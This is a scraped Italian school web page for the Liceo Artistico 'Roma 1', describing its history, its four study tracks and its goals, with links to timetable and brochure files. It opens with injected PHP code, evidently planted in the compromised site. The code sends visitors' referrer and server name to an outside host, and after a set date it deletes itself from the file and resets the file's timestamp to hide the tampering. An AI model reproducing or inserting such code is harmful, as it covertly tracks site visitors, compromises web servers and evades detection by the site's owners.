check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } ex Istituto d'Arte "Roma 1"
Get Adobe Flash player

Nuovo sito

nuovosito 1

ex Istituto d'Arte "Roma 1"

Memoria, progettualità, innovazione, per un futuro possibile.
Il Liceo Artistico “Roma1”, conserva la propria specificità coniugando il sapere squisitamente artigianale con una cultura scientifica e umanistica, facendo proprie tutte le innovazioni tecnologiche ed informatiche.
La consapevolezza, di una scuola dinamica che miri all'acquisizione di una cultura progettuale e versatile, aperta a tutti gli ambiti della creatività e della produzione, con attenzione ai processi storici e scientifici, nasce dalle origini della sua stessa fondazione.
Il Liceo Artistico Roma 1 è l’evoluzione dell’antica Scuola d’Arte fondata nel 1832 , di cui tutt’oggi custodisce la memoria storica, ospitando il Museo Artistico Industriale di Roma. Forte di questa tradizione, il liceo offre quattro indirizzi: architettura e ambiente, arti figurative, design e grafica con relativi laboratori artistici e aule multimediali,  dove elaborare e condividere idee e ipotesi, analizzare dati sperimentali, collegarli e contestualizzarli ai problemi della vita quotidiana. Promuovere e soddisfare le aspettative e i bisogni dei giovani è l’impegno che si prefigge il corpo insegnante attraverso una didattica pluridisciplinare, armoniosa e persuasiva.
Obiettivi formativi  che interagiscono e si integrano con la realtà per il raggiungimento delle conoscenze attraverso il saper fare, valorizzando le facoltà individuali e di gruppo, stimolando l’impegno e l’attenzione, sviluppando il pensiero creativo, attivando processi di coinvolgimento, dedizione, autostima e senso critico.
In quest’ottica gli studenti partecipano a concorsi ed eventi culturali proposti da Enti, Associazioni, Aziende con produzione di prototipi e di manufatti artistici esposti e premiati nelle sedi istituzionali come il MART di Rovereto, Il MUST di Lecce, il MACRO e il MAXXI, il Comune di Roma.
L’allievo è così guidato a maturare le competenze necessarie per accedere con successo al mondo del lavoro e dell’Università.

 

Allegati:
FileDescrizioneDimensione del File
Scarica questo file (QuadroOrario_2015.pdf)Quadro oraio 76 Kb
Scarica questo file (Pieghevole_2015.pdf)Pieghevole 1026 Kb